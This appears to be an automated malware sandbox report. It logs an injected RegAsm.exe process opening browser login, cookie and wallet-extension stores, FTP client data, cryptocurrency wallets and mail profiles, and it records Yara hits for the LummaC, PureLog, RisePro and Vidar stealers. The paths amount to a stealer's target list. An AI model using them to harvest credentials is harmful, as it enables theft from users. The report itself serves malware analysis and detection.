Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_blnieiiffboillknjnepogjhkgnoapac_0.indexeddb.leveldb\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\signons.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\signons.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\formhistory.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\logins.json	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\SUAVTZKNFL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\SUAVTZKNFL

Source: Yara match

File source: Process Memory Space: RegAsm.exe PID: 7236, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected PureLog Stealer

Source: Yara match	File source: 46.0.MSIUpdaterV168.exe.f50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002E.00000000.1886815779.0000000000F52000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\AdobeUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\AdobeUpdaterV168.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\meta2806[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe, type: DROPPED

Yara detected RisePro Stealer

Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 8188, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Wb7RPsmWU0j98XyD1Ncm8BU.zip, type: DROPPED

Yara detected Vidar stealer

Source: Yara match	File source: 34.2.MSIUpdaterV168.exe.4c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.MSIUpdaterV168.exe.4c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.8x9h3ctqkpfTu0sNF0X2.exe.e30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000024.00000002.1988085776.00000000004F4000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.2029351588.00000000004F4000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.1886573131.0000000000E64000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 8x9h3ctqkpfTu0sNF0X2.exe PID: 7268, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7236, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSIUpdaterV168.exe PID: 2504, type: MEMORYSTR
